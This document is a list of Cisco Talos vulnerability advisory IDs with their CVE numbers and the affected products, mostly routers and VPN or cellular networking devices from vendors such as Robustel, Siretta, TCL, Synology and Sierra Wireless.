TALOS-2023-1702 | CVE-2023-23907 | MilesightVPN
TALOS-2023-1701 | CVE-2023-22319 | MilesightVPN
TALOS-2023-1700 | CVE-2023-22844 | MilesightVPN
TALOS-2022-1598 | CVE-2022-38458 | Netgear Orbi Router RBR750
TALOS-2022-1597 | CVE-2022-36429 | Netgear Orbi Satellite RBS750
TALOS-2022-1596 | CVE-2022-37337 | Netgear Orbi Router RBR750
TALOS-2022-1595 | CVE-2022-38452 | Netgear Orbi Router RBR750
TALOS-2019-0893 | CVE-2019-5101 - CVE-2019-5102 | OpenWrt
TALOS-2022-1580 | CVE-2022-34845 | Robustel R1510
TALOS-2022-1579 | CVE-2022-33897 | Robustel R1510
TALOS-2022-1578 | CVE-2022-34850 | Robustel R1510
TALOS-2022-1577 | CVE-2022-33150 | Robustel R1510
TALOS-2022-1576 | CVE-2022-32765 | Robustel R1510
TALOS-2022-1575 | CVE-2022-35261 - CVE-2022-35271 | Robustel R1510
TALOS-2022-1573 | CVE-2022-33325 - CVE-2022-33329 | Robustel R1510
TALOS-2022-1572 | CVE-2022-33312 - CVE-2022-33314 | Robustel R1510
TALOS-2022-1571 | CVE-2022-28127 | Robustel R1510
TALOS-2022-1570 | CVE-2022-32585 | Robustel R1510
TALOS-2018-0756 | CVE-2018-4072 - CVE-2018-4073 | Sierra Wireless Airlink
TALOS-2018-0755 | CVE-2018-4070 - CVE-2018-4071 | Sierra Wireless Airlink
TALOS-2018-0754 | CVE-2018-4069 | Sierra Wireless Airlink
TALOS-2018-0753 | CVE-2018-4068 | Sierra Wireless Airlink
TALOS-2018-0752 | CVE-2018-4067 | Sierra Wireless Airlink
TALOS-2018-0751 | CVE-2018-4066 | Sierra Wireless Airlink
TALOS-2018-0750 | CVE-2018-4065 | Sierra Wireless Airlink
TALOS-2018-0749 | CVE-2018-4064 | Sierra Wireless Airlink
TALOS-2018-0748 | CVE-2018-4063 | Sierra Wireless Airlink
TALOS-2018-0747 | CVE-2018-4062 | Sierra Wireless Airlink
TALOS-2018-0746 | CVE-2018-4061 | Sierra Wireless Airlink
TALOS-2022-1640 | CVE-2022-42490 - CVE-2022-42493 | Siretta QUARTZ-GOLD
TALOS-2022-1639 | CVE-2022-41991 | Siretta QUARTZ-GOLD
TALOS-2022-1638 | CVE-2022-40222 | Siretta QUARTZ-GOLD
TALOS-2022-1637 | CVE-2022-41154 | Siretta QUARTZ-GOLD
TALOS-2022-1615 | CVE-2022-38066 | Siretta QUARTZ-GOLD
TALOS-2022-1613 | CVE-2022-40985 - CVE-2022-41030 | Siretta QUARTZ-GOLD
TALOS-2022-1612 | CVE-2022-40220 | Siretta QUARTZ-GOLD
TALOS-2022-1611 | CVE-2022-39045 | Siretta QUARTZ-GOLD
TALOS-2022-1610 | CVE-2022-38715 | Siretta QUARTZ-GOLD
TALOS-2022-1609 | CVE-2022-38088 | Siretta QUARTZ-GOLD
TALOS-2022-1608 | CVE-2022-38459 | Siretta QUARTZ-GOLD
TALOS-2022-1607 | CVE-2022-40969 | Siretta QUARTZ-GOLD
TALOS-2022-1606 | CVE-2022-40701 | Siretta QUARTZ-GOLD
TALOS-2022-1605 | CVE-2022-36279 | Siretta QUARTZ-GOLD
TALOS-2020-1064 | None (Cloud) | Synology QuickConnect
TALOS-2020-1060 | None (Cloud) | Synology QuickConnect
TALOS-2020-1087 | CVE-2020-27659 - CVE-2020-27660 | Synology SRM
TALOS-2020-1086 | CVE-2020-27658 | Synology SRM
TALOS-2020-1071 | CVE-2020-27656 - CVE-2020-27657 | Synology SRM
TALOS-2020-1066 | CVE-2020-27655 | Synology SRM
TALOS-2020-1065 | CVE-2020-27654, CVE-2020-11117 | Synology SRM
TALOS-2020-1061 | CVE-2020-27652 - CVE-2020-27653 | Synology SRM
TALOS-2020-1059 | CVE-2020-27650 - CVE-2020-27651 | Synology SRM
TALOS-2020-1058 | CVE-2020-27648 - CVE-2020-27649 | Synology SRM
TALOS-2020-1051 | CVE-2019-11823 | Synology SRM
TALOS-2022-1507 | CVE-2022-26346 | TCL LinkHub Mesh Wifi
TALOS-2022-1506 | CVE-2022-27178 | TCL LinkHub Mesh Wifi
TALOS-2022-1505 | CVE-2022-27185 | TCL LinkHub Mesh Wifi
TALOS-2022-1504 | CVE-2022-27630 | TCL LinkHub Mesh Wifi
TALOS-2022-1503 | CVE-2022-27633 | TCL LinkHub Mesh Wifi
TALOS-2022-1502 | CVE-2022-27660 | TCL LinkHub Mesh Wifi
TALOS-2022-1484 | CVE-2022-26342 | TCL LinkHub Mesh Wifi
TALOS-2022-1483 | CVE-2022-26009 | TCL LinkHub Mesh Wifi
TALOS-2022-1482 | CVE-2022-25996 | TCL LinkHub Mesh Wifi
TALOS-2022-1463 | CVE-2022-24005 - CVE-2022-24029 | TCL LinkHub Mesh Wifi
TALOS-2022-1462 | CVE-2022-23103 | TCL LinkHub Mesh Wifi
TALOS-2022-1459 | CVE-2022-22144 | TCL LinkHub Mesh Wifi
TALOS-2022-1458 | CVE-2022-22140 | TCL LinkHub Mesh Wifi
TALOS-2022-1457 | CVE-2022-21178 | TCL LinkHub Mesh Wifi
TALOS-2022-1456 | CVE-2022-21201 | TCL LinkHub Mesh Wifi
TALOS-2022-1455 | CVE-2022-23918 - CVE-2022-23919 | TCL LinkHub Mesh Wifi
TALOS-2022-1454 | CVE-2022-23399 | TCL LinkHub Mesh Wifi
TALOS-2018-0620 | CVE-2018-3951 | TP-Link TL-R600VPN
TALOS-2018-0619 | CVE-2018-3950 | TP-Link TL-R600VPN
TALOS-2018-0618 | CVE-2018-3949 | TP-Link TL-R600VPN
TALOS-2018-0617 | CVE-2018-3948 | TP-Link TL-R600VPN
TALOS-2021-1321 | CVE-2021-21749 | ZTE MF971R
TALOS-2021-1320 | CVE-2021-21748 | ZTE MF971R
TALOS-2021-1319 | CVE-2021-21747 | ZTE MF971R
TALOS-2021-1318 | CVE-2021-21746 | ZTE MF971R
TALOS-2021-1317 | CVE-2021-21745 | ZTE MF971R
TALOS-2021-1316 | CVE-2021-21744 | ZTE MF971R
TALOS-2021-1313 | CVE-2021-21743 | ZTE MF971R
